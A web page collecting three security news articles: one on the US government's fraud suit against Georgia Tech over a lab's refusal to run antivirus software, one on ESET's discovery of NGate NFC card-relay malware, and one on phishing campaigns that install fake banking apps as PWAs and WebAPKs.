after-cybersecurity-lab-wouldn’t-use-av-software,-us-accuses-georgia-tech-of-fraud

After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud

Photo of Georgia Tech

Georgia Tech

Dr. Emmanouil “Manos” Antonakakis runs a Georgia Tech cybersecurity lab and has attracted millions of dollars in the last few years from the US government for Department of Defense research projects like “Rhamnousia: Attributing Cyber Actors Through Tensor Decomposition and Novel Data Acquisition.”

The government yesterday sued Georgia Tech in federal court, singling out Antonakakis and claiming that neither he nor Georgia Tech followed basic (and required) security protocols for years, knew they were not in compliance with such protocols, and then submitted invoices for their DoD projects anyway. (Read the complaint.) The government claims this is fraud:

At bottom, DoD paid for military technology that Defendants stored in an environment that was not secure from unauthorized disclosure, and Defendants failed to even monitor for breaches so that they and DoD could be alerted if information was compromised. What DoD received for its funds was of diminished or no value, not the benefit of its bargain.

AV hate

Given the nature of his work for DoD, Antonakakis and his lab are required to abide by many sets of security rules, including those outlined in NIST Special Publication 800–171, “Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations.”

One of the rules says that machines storing or accessing such “controlled unclassified information” need to have endpoint antivirus software installed. But according to the US government, Antonakakis really, really doesn’t like putting AV detection software on his lab’s machines.

Georgia Tech admins asked him to comply with the requirement, but according to an internal 2019 email, Antonakakis “wasn’t receptive to such a suggestion.” In a follow-up email, Antonakakis himself said that “endpoint [antivirus] agent is a nonstarter.”

According to the government, “Other than Dr. Antonakakis’s opposition, there was nothing preventing the lab from running antivirus protection. Dr. Antonakakis simply did not want to run it.”

The IT director for Antonakakis’ lab was allowed to use other “mitigating measures” instead, such as relying on the school’s firewall for additional security. The IT director said that he thought Georgia Tech ran antivirus scans from its network. However, this “assumption” turned out to be completely wrong; the school’s network “has never provided” antivirus protection and, even if it had, the lab used laptops that were regularly taken outside the network perimeter.

The school realized after some time that the lab was not in compliance with the DoD contract rules, so an administrator decided to “suspend invoicing” on the lab’s contracts so that the school would not be charged with filing false claims.

According to the government, “Within a few days of the invoicing for his contracts being suspended, Dr. Antonakakis relented on his years-long opposition to the installation of antivirus software in the Astrolavos Lab. Georgia Tech’s standard antivirus software was installed throughout the lab.”

But, says the government, the school never acknowledged that it had been out of compliance for some time and that it had filed numerous invoices while noncompliant. In the government’s telling, this is fraud.

After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud Read More »

android-malware-steals-payment-card-data-using-previously-unseen-technique

Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.

High angle shot of female hand inserting her bank card into automatic cash machine in the city. Withdrawing money, paying bills, checking account balances and make a bank transfer. Privacy protection, internet and mobile banking security concept

Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which as reported Thursday can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps available from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

Enlarge / NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

Enlarge / Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

The cloning could all occur in situations where the attacker has physical access to a card or is able to briefly read a card in unattended purses, wallets, backpacks, or smartphone cases holding cards. To perform and emulate such attacks requires the attacker to have a rooted and customized Android device. Phones that were infected by NGate didn’t have this requirement.

Android malware steals payment card data using previously unseen technique Read More »

novel-technique-allows-malicious-apps-to-escape-ios-and-android-guardrails

Novel technique allows malicious apps to escape iOS and Android guardrails

NOW YOU KNOW —

Web-based apps escape iOS “Walled Garden” and Android side-loading protections.

An image illustrating a phone infected with malware

Getty Images

Phishers are using a novel technique to trick iOS and Android users into installing malicious apps that bypass safety guardrails built by both Apple and Google to prevent unauthorized apps.

Both mobile operating systems employ mechanisms designed to help users steer clear of apps that steal their personal information, passwords, or other sensitive data. iOS bars the installation of all apps other than those available in its App Store, an approach widely known as the Walled Garden. Android, meanwhile, is set by default to allow only apps available in Google Play. Sideloading—or the installation of apps from other markets—must be manually allowed, something Google warns against.

When native apps aren’t

Phishing campaigns making the rounds over the past nine months are using previously unseen ways to workaround these protections. The objective is to trick targets into installing a malicious app that masquerades as an official one from the targets’ bank. Once installed, the malicious app steals account credentials and sends them to the attacker in real time over Telegram.

“This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation,” Jakub Osmani, an analyst with security firm ESET, wrote Tuesday. “For iOS users, such an action might break any ‘walled garden’ assumptions about security. On Android, this could result in the silent installation of a special kind of APK, which on further inspection even appears to be installed from the Google Play store.”

The novel method involves enticing targets to install a special type of app known as a Progressive Web App. These apps rely solely on Web standards to render functionalities that have the feel and behavior of a native app, without the restrictions that come with them. The reliance on Web standards means PWAs, as they’re abbreviated, will in theory work on any platform running a standards-compliant browser, making them work equally well on iOS and Android. Once installed, users can add PWAs to their home screen, giving them a striking similarity to native apps.

While PWAs can apply to both iOS and Android, Osmani’s post uses PWA to apply to iOS apps and WebAPK to Android apps.

Installed phishing PWA (left) and real banking app (right).

Enlarge / Installed phishing PWA (left) and real banking app (right).

ESET

Comparison between an installed phishing WebAPK (left) and real banking app (right).

Enlarge / Comparison between an installed phishing WebAPK (left) and real banking app (right).

ESET

The attack begins with a message sent either by text message, automated call, or through a malicious ad on Facebook or Instagram. When targets click on the link in the scam message, they open a page that looks similar to the App Store or Google Play.

Example of a malicious advertisement used in these campaigns.

Example of a malicious advertisement used in these campaigns.

ESET

Phishing landing page imitating Google Play.

Phishing landing page imitating Google Play.

ESET

ESET’s Osmani continued:

From here victims are asked to install a “new version” of the banking application; an example of this can be seen in Figure 2. Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only), or as a PWA for iOS and Android users (if the campaign is not WebAPK based). This crucial installation step bypasses traditional browser warnings of “installing unknown apps”: this is the default behavior of Chrome’s WebAPK technology, which is abused by the attackers.

Example copycat installation page.

Example copycat installation page.

ESET

The process is a little different for iOS users, as an animated pop-up instructs victims how to add the phishing PWA to their home screen (see Figure 3). The pop-up copies the look of native iOS prompts. In the end, even iOS users are not warned about adding a potentially harmful app to their phone.

Figure 3 iOS pop-up instructions after clicking

Figure 3 iOS pop-up instructions after clicking “Install” (credit: Michal Bláha)

ESET

After installation, victims are prompted to submit their Internet banking credentials to access their account via the new mobile banking app. All submitted information is sent to the attackers’ C&C servers.

The technique is made all the more effective because application information associated with the WebAPKs will show they were installed from Google Play and have been assigned no system privileges.

WebAPK info menu—notice the

WebAPK info menu—notice the “No Permissions” at the top and “App details in store” section at the bottom.

ESET

So far, ESET is aware of the technique being used against customers of banks mostly in Czechia and less so in Hungary and Georgia. The attacks used two distinct command-and-control infrastructures, an indication that two different threat groups are using the technique.

“We expect more copycat applications to be created and distributed, since after installation it is difficult to separate the legitimate apps from the phishing ones,” Osmani said.

Novel technique allows malicious apps to escape iOS and Android guardrails Read More »